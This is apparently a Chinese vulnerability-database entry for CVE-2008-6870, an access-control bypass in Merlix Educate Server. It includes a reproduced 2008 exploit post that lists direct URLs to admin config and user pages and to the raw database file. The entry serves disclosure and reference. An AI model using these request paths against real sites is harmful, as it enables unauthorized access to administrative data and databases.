https://www.exploit-db.com/exploits/7348
https://www.securityfocus.com/bid/84495
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-342
Merlix Educate Server 权限许可漏洞






漏洞ID | 1116951 | 漏洞类型 | 权限许可和访问控制 |
发布时间 | 2008-12-05 | 更新时间 | 2009-07-23 |
![]() |
CVE-2008-6870 | ![]() |
CNNVD-200907-342 |
漏洞平台 | ASP | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
MerlixEducate服务器中存在权限许可漏洞。远程攻击者可以借助(1)config.asp和(2)users.asp的直接请求,绕过安全控制从而获取敏感信息。
|漏洞EXP
[~] Merlix Educate Servert Bypass/DD Multiple Remote Vuln
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
exp for demo: ( Bypass )
http://demo.merlix.com/school/admin/config.asp
http://demo.merlix.com/school/admin/users.asp
exp for demo: ( DD )
http://demo.merlix.com/school/db/db.mdb
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-12-05]
|受影响的产品
Merlix Educate Server -
|参考资料
来源:XF
名称:educateservert-configusers-security-bypass(47107)
链接:http://xforce.iss.net/xforce/xfdb/47107
来源:MILW0RM
名称:7348
链接:http://www.milw0rm.com/exploits/7348
检索漏洞
开始时间
结束时间